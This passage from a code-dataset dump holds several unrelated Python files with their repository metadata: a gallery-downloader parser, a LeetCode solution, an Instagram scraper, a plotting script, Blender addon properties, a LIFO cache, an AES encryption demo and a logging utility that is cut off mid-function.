try:\n self.crawl_urls(\n urls, wanted_filters=wanted_filters, wanted_only=wanted_only,\n preselected_wanted_matches=preselected_wanted_matches\n )\n except BaseException:\n logger.critical(traceback.format_exc())\n close_old_connections()\n\n def crawl_urls(\n self, urls: list[str],\n wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None\n ) -> None:\n pass\n\n def post_gallery_processing(self, gallery_entry: 'Gallery', gallery_data: 'GalleryData'):\n pass\n\n def is_current_link_non_current(self, gallery_data: 'GalleryData') -> bool:\n return False\n\n def pass_gallery_data_to_downloaders(self, gallery_data_list: list[GalleryData], gallery_wanted_lists: dict[str, list['WantedGallery']], force_provider: bool = False):\n gallery_count = len(gallery_data_list)\n\n if self.time_taken_wanted:\n logger.info(\n \"Time taken to compare with WantedGallery: {} seconds.\".format(int(self.time_taken_wanted + 0.5)))\n\n if gallery_count == 0:\n logger.info(\"No galleries need downloading, returning.\")\n return\n else:\n logger.info(\"{} galleries for downloaders to work with.\".format(gallery_count))\n\n if not self.settings.update_metadata_mode:\n downloaders_msg = 'Downloaders (name, priority):'\n\n for downloader in self.downloaders:\n downloaders_msg += \" ({}, {})\".format(downloader[0], downloader[1])\n logger.info(downloaders_msg)\n\n for i, gallery in enumerate(gallery_data_list, start=1):\n if self.last_used_downloader is not None and self.last_used_downloader.type not in self.__SKIP_WAIT_TIME_DOWNLOADER_TYPES:\n # We can't assume that every parser has its own downloader,\n # could be from another provider, so we can't directly use self.own_settings\n last_used_provider = self.last_used_downloader.provider\n if last_used_provider in self.settings.providers:\n time.sleep(self.settings.providers[last_used_provider].wait_timer)\n elif self.own_settings:\n time.sleep(self.own_settings.wait_timer)\n else:\n time.sleep(self.settings.wait_timer)\n logger.info(\"Working with gallery {} of {}\".format(i, gallery_count))\n if self.settings.add_as_public:\n gallery.public = True\n self.work_gallery_data(gallery, gallery_wanted_lists, force_provider)\n\n def work_gallery_data(self, gallery: GalleryData, gallery_wanted_lists: dict[str, list['WantedGallery']], force_provider: bool = False) -> None:\n\n if not self.settings.found_gallery_model:\n logger.error(\"FoundGallery model has not been initiated.\")\n return\n\n if gallery.title is not None:\n logger.info(\"Title: {}. Link: {}\".format(gallery.title, gallery.link))\n else:\n logger.info(\"Link: {}\".format(gallery.link))\n\n # If there's a WG match, and we are processing submitted galleries, revert the downloaders to default.\n if len(gallery_wanted_lists[gallery.gid]) > 0 and len(self.downloaders) == 1 and self.downloaders[0][0].type == 'submit':\n to_use_downloaders = self.settings.provider_context.get_downloaders(\n self.settings, self.general_utils,\n filter_name=self.name, priorities=self.settings.back_up_downloaders\n )\n downloaders_msg = 'WantedGallery match, reverting to default downloaders (name, priority):'\n for downloader in to_use_downloaders:\n downloaders_msg += \" ({}, {})\".format(downloader[0], downloader[1])\n logger.info(downloaders_msg)\n elif force_provider:\n to_use_downloaders = self.settings.provider_context.get_downloaders(\n self.settings, self.general_utils,\n filter_name=gallery.provider\n )\n downloaders_msg = 'Forcing downloaders to Gallery provider: {}. Downloaders (name, priority):'.format(gallery.provider)\n for downloader in to_use_downloaders:\n downloaders_msg += \" ({}, {})\".format(downloader[0], downloader[1])\n logger.info(downloaders_msg)\n else:\n to_use_downloaders = self.downloaders\n\n is_link_non_current = False\n\n if self.settings.non_current_links_as_deleted:\n is_link_non_current = self.is_current_link_non_current(gallery)\n if is_link_non_current:\n to_use_downloaders = self.settings.provider_context.get_downloaders(\n self.settings, self.general_utils,\n filter_name=\"{}_info\".format(self.name), force=True\n )\n logger.info(\n \"Link: {} detected as non-current, it will be added as deleted.\".format(\n gallery.link\n )\n )\n\n for cnt, downloader in enumerate(to_use_downloaders):\n downloader[0].init_download(copy.deepcopy(gallery), wanted_gallery_list=gallery_wanted_lists[gallery.gid])\n\n if downloader[0].return_code == 1:\n\n if (cnt + 1) == len(to_use_downloaders) and downloader[0].mark_hidden_if_last:\n if downloader[0].gallery_db_entry:\n downloader[0].gallery_db_entry.hidden = True\n downloader[0].gallery_db_entry.simple_save()\n\n self.last_used_downloader = downloader[0]\n if not downloader[0].archive_only:\n for wanted_gallery in gallery_wanted_lists[gallery.gid]:\n self.settings.found_gallery_model.objects.get_or_create(\n wanted_gallery=wanted_gallery,\n gallery=downloader[0].gallery_db_entry\n )\n\n if len(gallery_wanted_lists[gallery.gid]) > 0:\n wanted_gallery_found.send(\n sender=self.settings.gallery_model,\n gallery=downloader[0].gallery_db_entry,\n archive=downloader[0].archive_db_entry,\n wanted_gallery_list=gallery_wanted_lists[gallery.gid]\n )\n if downloader[0].archive_db_entry:\n if not downloader[0].archive_only and downloader[0].gallery_db_entry:\n logger.info(\n \"Download complete, using downloader: {}. Archive link: {}. Gallery link: {}\".format(\n downloader[0],\n downloader[0].archive_db_entry.get_absolute_url(),\n downloader[0].gallery_db_entry.get_absolute_url()\n )\n )\n if self.gallery_callback:\n self.gallery_callback(downloader[0].gallery_db_entry, gallery.link, 'success')\n if self.archive_callback:\n self.archive_callback(downloader[0].archive_db_entry, gallery.link, 'success')\n else:\n logger.info(\n \"Download complete, using downloader: {}. Archive link: {}. No gallery associated\".format(\n downloader[0],\n downloader[0].archive_db_entry.get_absolute_url(),\n )\n )\n if self.archive_callback:\n self.archive_callback(downloader[0].archive_db_entry, gallery.link, 'success')\n elif downloader[0].gallery_db_entry:\n logger.info(\n \"Download completed successfully (gallery only), using downloader: {}. Gallery link: {}\".format(\n downloader[0],\n downloader[0].gallery_db_entry.get_absolute_url()\n )\n )\n if self.gallery_callback:\n self.gallery_callback(downloader[0].gallery_db_entry, gallery.link, 'success')\n\n # Process possible nested galleries (contained, magazine)\n # To avoid downloading extra Archives, it will only be possible to autoadd Gallery only downloads\n # Second, to avoid keeping check of already processed galleries, considering they could be\n # downloaded from different queues, it will only work with 1 level deep, so that no infinite\n # nesting happens\n # Note that we have a filter here to not add galleries that already exist.\n # If the gallery already exists, the relationship will be set backwards, without\n # needing to process the Gallery directly\n # Also, don't auto download related galleries when check submissions\n if not self.settings.stop_nested and \\\n self.settings.auto_download_nested and \\\n self.settings.workers.web_queue and \\\n self.settings.gallery_model and \\\n self.downloaders[0][0].type != 'submit':\n if gallery.gallery_contains_gids:\n existing_gids = self.settings.gallery_model.objects.filter(\n gid__in=gallery.gallery_contains_gids,\n provider=gallery.provider\n ).values_list('gid', flat=True)\n\n gallery_urls = [\n self.settings.gallery_model(gid=x, provider=gallery.provider).get_link() for x in gallery.gallery_contains_gids if x not in existing_gids\n ]\n gallery_urls.append(\"--stop-nested\")\n\n logger.info(\n \"Gallery: {} contains galleries: {}, adding to queue\".format(\n downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_urls\n )\n )\n\n self.settings.workers.web_queue.enqueue_args_list(gallery_urls)\n\n if gallery.magazine_chapters_gids:\n existing_gids = self.settings.gallery_model.objects.filter(\n gid__in=gallery.magazine_chapters_gids,\n provider=gallery.provider\n ).values_list('gid', flat=True)\n\n gallery_urls = [\n self.settings.gallery_model(gid=x, provider=gallery.provider).get_link() for x in gallery.magazine_chapters_gids if x not in existing_gids\n ]\n gallery_urls.append(\"--stop-nested\")\n\n logger.info(\n \"Gallery: {} is a magazine and contains galleries: {}, adding to queue\".format(\n downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_urls\n )\n )\n\n self.settings.workers.web_queue.enqueue_args_list(gallery_urls)\n\n if gallery.magazine_gid and not self.settings.gallery_model.objects.filter(gid=gallery.magazine_gid, provider=gallery.provider):\n gallery_url = self.settings.gallery_model(gid=gallery.magazine_gid, provider=gallery.provider).get_link()\n logger.info(\n \"Gallery: {} is in magazine: {}, adding to queue\".format(\n downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_url\n )\n )\n self.settings.workers.web_queue.enqueue_args_list([gallery_url, \"--stop-nested\"])\n\n if gallery.gallery_container_gid and not self.settings.gallery_model.objects.filter(gid=gallery.gallery_container_gid, provider=gallery.provider):\n gallery_url = self.settings.gallery_model(gid=gallery.gallery_container_gid, provider=gallery.provider).get_link()\n logger.info(\n \"Gallery: {} is contained in: {}, adding to queue\".format(\n downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_url\n )\n )\n self.settings.workers.web_queue.enqueue_args_list([gallery_url, \"--stop-nested\"])\n\n self.post_gallery_processing(downloader[0].gallery_db_entry, gallery)\n\n if self.settings.non_current_links_as_deleted:\n if is_link_non_current:\n downloader[0].gallery_db_entry.mark_as_deleted()\n\n return\n elif downloader[0].return_code == 0 and (cnt + 1) == len(to_use_downloaders):\n self.last_used_downloader = None\n if not downloader[0].archive_only:\n downloader[0].original_gallery = gallery\n downloader[0].original_gallery.dl_type = 'failed'\n downloader[0].original_gallery.hidden = True\n downloader[0].update_gallery_db()\n if downloader[0].gallery_db_entry:\n logger.warning(\n \"Download completed unsuccessfully using downloader: {},\"\n \" set as failed as it\\'s the last one. Gallery link: {}\".format(\n downloader[0],\n downloader[0].gallery_db_entry.get_absolute_url()\n )\n )\n if self.gallery_callback:\n self.gallery_callback(downloader[0].gallery_db_entry, gallery.link, 'failed')\n for wanted_gallery in gallery_wanted_lists[gallery.gid]:\n self.settings.found_gallery_model.objects.get_or_create(\n wanted_gallery=wanted_gallery,\n gallery=downloader[0].gallery_db_entry\n )\n\n self.post_gallery_processing(downloader[0].gallery_db_entry, gallery)\n\n if self.settings.non_current_links_as_deleted:\n if self.is_current_link_non_current(gallery):\n downloader[0].gallery_db_entry.mark_as_deleted()\n\n else:\n logger.warning(\n \"Download completed unsuccessfully using downloader: {},\"\n \" could not set as failed, no entry was updated on the database\".format(\n downloader[0]\n )\n )\n else:\n logger.warning(\n \"Download completed unsuccessfully using downloader: {},\"\n \" no entry was updated on the database\".format(downloader[0])\n )\n if self.gallery_callback:\n self.gallery_callback(None, gallery.link, 'failed')\n else:\n logger.info(\n \"Download was unsuccessful, using downloader {}. Trying with the next downloader.\".format(\n downloader[0],\n )\n )\n\n\n# This assumes we got the data in the format that the API uses (\"gc\" format).\nclass InternalParser(BaseParser):\n name = ''\n ignore = True\n\n def crawl_json(self, json_string: str, wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False) -> None:\n\n if not self.settings.gallery_model:\n return\n\n dict_list = []\n json_decoded = json.loads(json_string)\n\n if type(json_decoded) == dict:\n dict_list.append(json_decoded)\n elif type(json_decoded) == list:\n dict_list = json_decoded\n\n galleries_gids = []\n found_galleries = set()\n total_galleries_filtered: list[GalleryData] = []\n gallery_wanted_lists: dict[str, list['WantedGallery']] = defaultdict(list)\n\n for gallery in dict_list:\n galleries_gids.append(gallery['gid'])\n gallery['posted'] = datetime.fromtimestamp(int(gallery['posted']), timezone.utc)\n gallery_data = GalleryData(**gallery)\n total_galleries_filtered.append(gallery_data)\n\n for galleries_gid_group in list(chunks(galleries_gids, 900)):\n for found_gallery in self.settings.gallery_model.objects.filter(gid__in=galleries_gid_group):\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery=found_gallery,\n link=found_gallery.get_link()\n )\n\n if discard_approved:\n logger.info(discard_message)\n found_galleries.add(found_gallery.gid)\n\n for count, gallery_data in enumerate(total_galleries_filtered):\n\n if gallery_data.gid in found_galleries:\n continue\n\n banned_result, banned_reasons = self.general_utils.discard_by_gallery_data(gallery_data.tags, gallery_data.uploader)\n\n if banned_result:\n logger.info(\n \"Gallery {} of {}: Skipping gallery link {}, discarded reasons: {}\".format(\n count,\n len(total_galleries_filtered),\n gallery_data.title,\n banned_reasons\n )\n )\n continue\n\n if wanted_filters:\n self.compare_gallery_with_wanted_filters(\n gallery_data,\n gallery_data.link,\n wanted_filters,\n gallery_wanted_lists\n )\n if wanted_only and not gallery_wanted_lists[gallery_data.gid]:\n continue\n\n logger.info(\n \"Gallery {} of {}: Gallery {} will be processed.\".format(\n count,\n len(total_galleries_filtered),\n gallery_data.title\n )\n )\n\n if gallery_data.thumbnail:\n original_thumbnail_url = gallery_data.thumbnail_url\n\n gallery_data.thumbnail_url = gallery_data.thumbnail\n\n gallery_instance = self.settings.gallery_model.objects.update_or_create_from_values(gallery_data)\n\n gallery_instance.thumbnail_url = original_thumbnail_url\n\n gallery_instance.save()\n else:\n self.settings.gallery_model.objects.update_or_create_from_values(gallery_data)\n","repo_name":"pandabuilder/pandachaika","sub_path":"core/base/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":36640,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"9656425631","text":"class Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n output = \"\"\n minLen = min([len(s) for s in strs])\n for idx in range(minLen):\n seqPreserved = False\n curChar = \"\"\n for s in strs:\n char = s[idx]\n # print(curChar)\n if len(curChar) != 0 and char == curChar:\n seqPreserved = True\n elif len(curChar) != 0 and char != curChar:\n seqPreserved = False\n break\n elif len(curChar) == 0:\n seqPreserved = True\n curChar = char\n else:\n break\n \n # print(curChar, seqPreserved, char, idx)\n if seqPreserved:\n output += curChar\n curChar = \"\"\n else:\n break\n # print()\n return output\n\n \n# Runtime: 41 ms, faster than 65.53% of Python3 online submissions for Longest Common Prefix.\n# Memory Usage: 14 MB, less than 80.10% of Python3 online submissions for Longest Common Prefix.","repo_name":"cphung3/leetcode-solutions","sub_path":"14. Longest Common Prefix.py","file_name":"14. Longest Common Prefix.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34581766726","text":"import sys\nimport requests\n\"\"\"This is my script in form of Command line script\"\"\"\n\n\ndef get_user_data(json_file, argv):\n print('User data')\n user_status = json_file['graphql']['user']['biography']\n followers = json_file['graphql']['user']['edge_followed_by']['count']\n posts_number = json_file['graphql']['user']['edge_owner_to_timeline_media']['count']\n print(posts_number)\n\n\ndef get_post_data(json_file, argv):\n post_list = json_file['graphql']['user']['edge_owner_to_timeline_media']['edges']\n url = [f'https://www.instagram.com/{argv}/p/{post[\"node\"][\"shortcode\"]}' for post in post_list]\n likes = [post['node']['edge_liked_by'] for post in post_list]\n comment = [post['node']['edge_media_to_comment']['count'] for post in post_list]\n return print(comment)\n\n\ndef request_json(argv, arg):\n request = requests.get(f'https://www.instagram.com/{argv}/?__a=1')\n if request.status_code == 404:\n print('Username is invalid')\n else:\n json_file = request.json()\n if arg == 'get_post_data':\n return get_post_data(json_file, argv)\n elif arg == 'get_user_data':\n return get_user_data(json_file, argv)\n else:\n print('Wrong function input')\n\n\ndef main(argv=None):\n if argv is None:\n argv = str(sys.argv[1])\n arg = str(sys.argv[2])\n request_json(argv, arg)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PTaHHHa/Instagram_PublicAPI_Scraper","sub_path":"command_line_script.py","file_name":"command_line_script.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43549500331","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import make_interp_spline\n\n\ndef main():\n fig = plt.figure(figsize=(16, 8))\n spec = fig.add_gridspec(2, 4)\n\n # data[type][vertices]: [y]\n data = [\n [\n [326, 167, 119, 185], # 240\n [2806, 1322, 941, 1074], # 480\n [8863, 5111, 3431, 3619], # 720\n [21377, 11165, 7158, 8053] # 960\n ],\n [\n [240, 480, 720, 960, 1200, 1440, 1680, 1920, 2160, 2400, 2640, 2880],\n [5, 40, 162, 372, 727, 1263, 1987, 2962, 4208, 5772, 7729, 9981]\n ],\n ]\n\n for i in range(4):\n ax = fig.add_subplot(spec[0, i])\n ax.set_title(f'MPI N={240 * (i + 1)}')\n x = np.array([1, 2, 3, 4])\n y = np.array(data[0][i])\n\n X_Y_Spline = make_interp_spline(x, y)\n\n X_ = np.linspace(x.min(), x.max(), 500)\n Y_ = X_Y_Spline(X_)\n ax.plot(X_, Y_)\n ax.set_xlabel('M, threads')\n ax.set_ylabel('t, ms')\n\n ax = fig.add_subplot(spec[1, :])\n ax.set_title(f'CUDA')\n x = np.array(data[1][0])\n y = np.array(data[1][1])\n\n X_Y_Spline = make_interp_spline(x, y)\n\n X_ = np.linspace(x.min(), x.max(), 500)\n Y_ = X_Y_Spline(X_)\n ax.plot(X_, Y_)\n ax.plot(X_, Y_)\n ax.set_xlabel('N, vertices')\n ax.set_ylabel('t, ms')\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aminjonshermatov/distributed_data_processing","sub_path":"algorithm/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39714292018","text":"import bpy\r\nimport json\r\nfrom bpy.props import (BoolProperty, StringProperty, EnumProperty, FloatProperty, FloatVectorProperty, IntProperty, IntVectorProperty, CollectionProperty, PointerProperty) \r\nfrom . import _functions_\r\n\r\n# this is most settings in the armature that we require to set things back and forth... (i have removed many settings that rarely if ever get used)\r\nGrouping = {\r\n # all the object settings we might want...\r\n 'Object' : {\r\n 'Transform' : ['location', 'rotation_euler', 'rotation_quaternion', 'rotation_axis_angle', 'rotation_mode', 'scale', \r\n 'delta_location', 'delta_rotation_quaternion', 'delta_rotation_euler', 'delta_scale'],\r\n 'Relations' : ['parent', 'parent_type', 'parent_bone', 'track_axis', 'up_axis', 'pass_index'], \r\n 'Instancing': ['instance_type', 'show_instancer_for_viewport', 'show_instancer_for_render', \r\n 'use_instance_vertices_rotation', 'use_instance_faces_scale', 'instance_faces_scale'], \r\n 'Display' : ['show_name', 'show_axis', 'show_in_front', 'show_axis', 'display_type', 'show_bounds', 'display_bounds_type']},\r\n # all the object data settings we might want... (pose and animation settings added here for convienience)\r\n 'Data' : {\r\n 'Skeleton' : ['pose_position', 'layers', 'layers_protected'],\r\n 'Pose' : ['bone_groups', 'pose_library', 'ik_solver', 'ik_param'],\r\n 'Animation' : ['action', 'use_nla', 'nla_tracks'],\r\n 'Display' : ['display_type', 'show_names', 'show_bone_custom_shapes', 'show_axes', 'show_group_colors']},\r\n # all the edit bone settings we might want... (used per bone)\r\n 'Edit Bone' : {\r\n 'Transform' : ['head', 'tail', 'roll', 'lock'],\r\n 'Bendy Bones' : ['bbone_segments', 'bbone_x', 'bbone_z', 'bbone_handle_type_start', 'bbone_custom_handle_start', \r\n 'bbone_handle_type_end', 'bbone_custom_handle_end', 'bbone_rollin', 'bbone_rollout', 'use_endroll_as_inroll',\r\n 'bbone_curveinx', 'bbone_curveiny', 'bbone_curveoutx', 'bbone_curveouty', 'bbone_easein', \r\n 'bbone_easeout', 'bbone_scaleinx', 'bbone_scaleiny', 'bbone_scaleoutx', 'bbone_scaleouty'],\r\n 'Relations' : ['parent', 'layers', 'use_connect', 'use_inherit_rotation', 'inherit_scale'],\r\n 'Deform' : ['use_deform', 'envelope_distance', 'envelope_weight', 'use_envelope_multiply', 'head_radius', 'tail_radius']},\r\n # all the pose bone settings we might want... (used per bone)\r\n 'Pose Bone' : {\r\n 'Posing' : ['location', 'lock_location', 'rotation_mode', 'rotation_quaternion', 'rotation_euler', \r\n 'rotation_axis_angle', 'lock_rotation_w', 'lock_rotation', 'scale', 'lock_scale'],\r\n 'Rigging' : ['constraints', 'drivers', 'bone_group'],\r\n 'IK Settings' : ['lock_ik_x', 'lock_ik_y', 'lock_ik_z', 'use_ik_limit_x', 'use_ik_limit_y', 'use_ik_limit_z', \r\n 'use_ik_rotation_control', 'use_ik_linear_control','ik_min_x', 'ik_max_x', 'ik_min_y', 'ik_max_y', 'ik_min_z', 'ik_max_z', \r\n 'ik_stiffness_x', 'ik_stiffness_y', 'ik_stiffness_z', 'ik_stretch', 'ik_rotation_weight', 'ik_linear_weight'],\r\n 'Display' : ['custom_shape', 'custom_shape_scale', 'use_custom_shape_bone_size', 'custom_shape_transform']},\r\n }\r\n\r\nPathing = {'Object' : \"bpy.data.objects\", 'Armature' : \"bpy.data.armatures\", 'Action' : \"bpy.data.actions\", \r\n 'Curve' : \"bpy.data.curves\", 'Edit Bone' : \"bpy.context.object.data.edit_bones\", 'Bone Group' : \"bpy.context.object.pose.bone_groups\"}\r\n\r\nclass JK_AES_Inherit(bpy.types.PropertyGroup):\r\n\r\n Type: EnumProperty(name=\"Type\", description=\"Type of property this boolean references\",\r\n items=[('BOOLEAN', \"Boolean\", \"\"), ('BOOLEAN_VECTOR', \"Boolean Vector\", \"\"), \r\n ('INTEGER', \"Integer\", \"\"), ('INTEGER_VECTOR', \"Integer Vector\", \"\"), \r\n ('FLOAT', \"Float\", \"\"), ('FLOAT_VECTOR', \"Float Vector\", \"\"),\r\n ('POINTER', \"Pointer\", \"\"), ('COLLECTION', \"Collection\", \"\")],\r\n default='BOOLEAN')\r\n\r\n Path: StringProperty(name=\"Path\", description=\"Path to this property. (if it's a pointer)\", default=\"\")\r\n \r\n Inherit: BoolProperty(name=\"Inherit\", description=\"Inherit this property value from parent stage\",\r\n default=True, options=set())\r\n\r\nclass JK_AES_Inherit_Group(bpy.types.PropertyGroup):\r\n \r\n Inherit: BoolProperty(name=\"Inherit\", description=\"Enable inheritance of this grouping\",\r\n default=False, options=set())\r\n\r\n Inheritance: CollectionProperty(type=JK_AES_Inherit)\r\n\r\nclass JK_AES_Inherit_Group_Bone(bpy.types.PropertyGroup):\r\n\r\n # collected edit bone inheritance...\r\n def Update_Edit_Bone_Inherit(self, context):\r\n if self.Edit_inherit:\r\n for group, props in Grouping['Edit Bone'].items():\r\n eb_grp = self.Edit_groups.add()\r\n eb_grp.name = group\r\n for prop in props:\r\n prop_iht = eb_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Edit_groups.clear()\r\n\r\n Edit_inherit: BoolProperty(name=\"Pull Edit Bone\", description=\"Inherit per bone edit mode settings from parent stage. (Head, Tail, Roll, etc)\",\r\n default=False, options=set(), update=Update_Edit_Bone_Inherit)\r\n \r\n Edit_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Edit_json: StringProperty(name=\"Edit Bone Dictionary\")\r\n\r\n # collected pose bone inheritance settings...\r\n def Update_Pose_Bone_Inherit(self, context):\r\n if self.Pose_inherit:\r\n for group, props in Grouping['Pose Bone'].items():\r\n pb_grp = self.Pose_groups.add()\r\n pb_grp.name = group\r\n for prop in props:\r\n prop_iht = pb_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Pose_groups.clear()\r\n\r\n Pose_inherit: BoolProperty(name=\"Pull Pose Bones\", description=\"Inherit per bone pose mode settings from parent stage. (Constraints, Drivers, etc)\",\r\n default=False, options=set(), update=Update_Pose_Bone_Inherit)\r\n \r\n Pose_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Pose_json: StringProperty(name=\"Pose Bone Dictionary\")\r\n\r\nclass JK_AES_Stage_Props(bpy.types.PropertyGroup):\r\n\r\n Armature: StringProperty(name=\"Armature\", description=\"Armature that defines this stage\", \r\n default=\"\", maxlen=1024)\r\n\r\n Is_source: BoolProperty(name=\"Is Source\", description=\"This is the source armature, there can only be one\",\r\n default=False, options=set())\r\n\r\n Show_details: BoolProperty(name=\"Show details\", description=\"Show pull settings for this stage\",\r\n default=False, options=set())\r\n \r\n Parent: StringProperty(name=\"Parent Stage\", description=\"The stage before this one\", \r\n default=\"\", maxlen=1024)\r\n\r\n # object inheritance...\r\n def Update_Object_Inherit(self, context):\r\n if self.Object_inherit:\r\n for group, props in Grouping['Object'].items():\r\n obj_grp = self.Object_groups.add()\r\n obj_grp.name = group\r\n for prop in props:\r\n prop_iht = obj_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Object_groups.clear()\r\n\r\n Object_inherit: BoolProperty(name=\"Pull Object\", description=\"Inherit object settings from parent stage. (NLA Strips, Pose Mode, Transforms, etc)\",\r\n default=False, options=set(), update=Update_Object_Inherit)\r\n\r\n Object_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Object_json: StringProperty(name=\"Object Dictionary\")\r\n \r\n # data inheritance...\r\n def Update_Data_Inherit(self, context):\r\n if self.Data_inherit:\r\n for group, props in Grouping['Data'].items():\r\n dat_grp = self.Data_groups.add()\r\n dat_grp.name = group\r\n for prop in props:\r\n prop_iht = dat_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Data_groups.clear()\r\n\r\n Data_inherit: BoolProperty(name=\"Pull Data\", description=\"Inherit data settings from parent stage. (Layers, Bone Groups, etc)\",\r\n default=False, options=set(), update=Update_Data_Inherit)\r\n\r\n Data_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Data_json: StringProperty(name=\"Data Dictionary\")\r\n \r\n # bone inheritance...\r\n Bones_inherit: BoolProperty(name=\"Pull Bones\", description=\"Inherit per bone edit mode settings from parent stage. (Head, Tail, Roll, etc)\",\r\n default=False, options=set())\r\n\r\n Bones: CollectionProperty(type=JK_AES_Inherit_Group_Bone)\r\n\r\n # addon data that might need saving per stage...\r\n Addon_json: StringProperty(name=\"Addon Dictionary\")\r\n\r\nclass JK_AES_Armature_Props(bpy.types.PropertyGroup):\r\n\r\n def Update_Stage(self, context):\r\n armature = bpy.context.object\r\n # lets not do anything silly like run a heap of code when we don't need to...\r\n if self.Stage != self.Last:\r\n last_mode = armature.mode\r\n if last_mode != 'OBJECT':\r\n bpy.ops.object.mode_set(mode='OBJECT')\r\n # save the properties of the current stage\r\n _functions_.Get_Stage_Properties(armature, self.Stages[self.Last])\r\n # the pull the inheritance hierarchy to the stage we are going to...\r\n _functions_.Pull_Hierarchy_Inheritance(armature, self.Stages[self.Stage])\r\n # then set the armature to the stage we are going to...\r\n _functions_.Set_Stage_Properties(armature, self.Stages[self.Stage])\r\n # set the last stage to the new stage...\r\n self.Last = self.Stage\r\n # and return the mode if we need to...\r\n if armature.mode != last_mode:\r\n bpy.ops.object.mode_set(mode=last_mode)\r\n \r\n Last: StringProperty(name=\"Last\", description=\"The stage we are coming from\", \r\n default=\"\", maxlen=1024)\r\n \r\n Stage: StringProperty(name=\"Stage\", description=\"The stage we are on\", \r\n default=\"\", maxlen=1024, update=Update_Stage, options={'ANIMATABLE'})\r\n \r\n Stages: CollectionProperty(type=JK_AES_Stage_Props, options=set())","repo_name":"Jim-Kroovy/B.L.E.N.D","sub_path":"BLEND-ArmatureEditingStages/_properties_.py","file_name":"_properties_.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"37"} +{"seq_id":"5119366789","text":"#!/usr/bin/python3\n\"\"\" LIFO is amazing! \"\"\"\nfrom base_caching import BaseCaching\n\n\nclass LIFOCache(BaseCaching):\n \"\"\"\n A class LIFOCache that inherits from BaseCaching and is a caching system\n \"\"\"\n def __init__(self):\n super().__init__()\n self.last_key = ''\n\n def put(self, key, item):\n \"\"\" Put new staff on self.cache_items \"\"\"\n if key and item:\n self.cache_data.update({key: item})\n if len(self.cache_data) > self.MAX_ITEMS:\n print(f\"DISCARD: {self.last_key}\")\n self.cache_data.pop(self.last_key)\n self.last_key = key\n\n def get(self, key):\n \"\"\" Get a specific item from self.cache_data \"\"\"\n if key:\n return self.cache_data.get(key)\n","repo_name":"WololoRC/holbertonschool-web_back_end","sub_path":"caching/2-lifo_cache.py","file_name":"2-lifo_cache.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29920628874","text":"from Crypto.Cipher import AES\n\n# need 16 bytes for each of these\nkey = b\"TheNeuralNineKey\"\nnonce = b\"TheNeuralNineNce\"\n\ncipher = AES.new(key, AES.MODE_EAX, nonce)\nciphertext = cipher.encrypt(b\"Hellow Workd!\")\n\nprint(ciphertext)\n\ncipher = AES.new(key, AES.MODE_EAX, nonce)\nprint(cipher.decrypt(ciphertext))","repo_name":"jb-williams/python_programs","sub_path":"NeuralNineTutorials/encryptedFileXfer/generate_key.py","file_name":"generate_key.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"721141555","text":"import sys, subprocess, pickle, os, json, logging, socket\nimport logging.config\nimport datetime\n\nfrom . import info\n\ndef getRunDir():\n return os.path.dirname(os.path.realpath(sys.argv[0]))\n\ndef setup_logger(logging_ini):\n if logging_ini is not None:\n print(\"Using custom logger\")\n else:\n logging_ini = os.path.join(info.CONFIGS, 'logging.ini')\n\n logging.config.fileConfig(logging_ini)\n logger = logging.getLogger(__name__)\n logger.info(\"**************************************************\")\n logger.info(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"))\n logger.info(\"Host: \" + str(socket.gethostname()))\n logger.info(\"Screen: \" + os.getenv(\"STY\", \"unknown\"))\n logger.info(\"PWD: \" + os.getenv(\"PWD\", \"unknown\"))\n logger.info(\"Cmd: \" + str(sys.argv))\n logger.info(\"**************************************************\")\n\ndef to_bool(obj):\n if str(obj).lower() in [\"true\", \"1\"]:\n return True\n elif str(obj).lower() in [\"false\", \"0\"]:\n return False\n else:\n raise Exception(\"to_bool: cannot convert to bool\")\n\ndef line_with_arg(line):\n line = line.strip()\n return line is not \"\" and not line.startswith(\"#\")\n\ndef parse_conv_spec(conv_spec, batch_size):\n # \"1x29x29:100,5x5,p2x2:200,4x4,p2x2,f\"\n conv_spec = conv_spec.replace('X', 'x')\n structure = conv_spec.split(':')\n conv_layer_configs = []\n for i in range(1, len(structure)):\n config = {}\n elements = structure[i].split(',')\n if i == 1:\n input_dims = structure[i - 1].split('x')\n prev_map_number = int(input_dims[0])\n prev_feat_dim_x = int(input_dims[1])\n prev_feat_dim_y 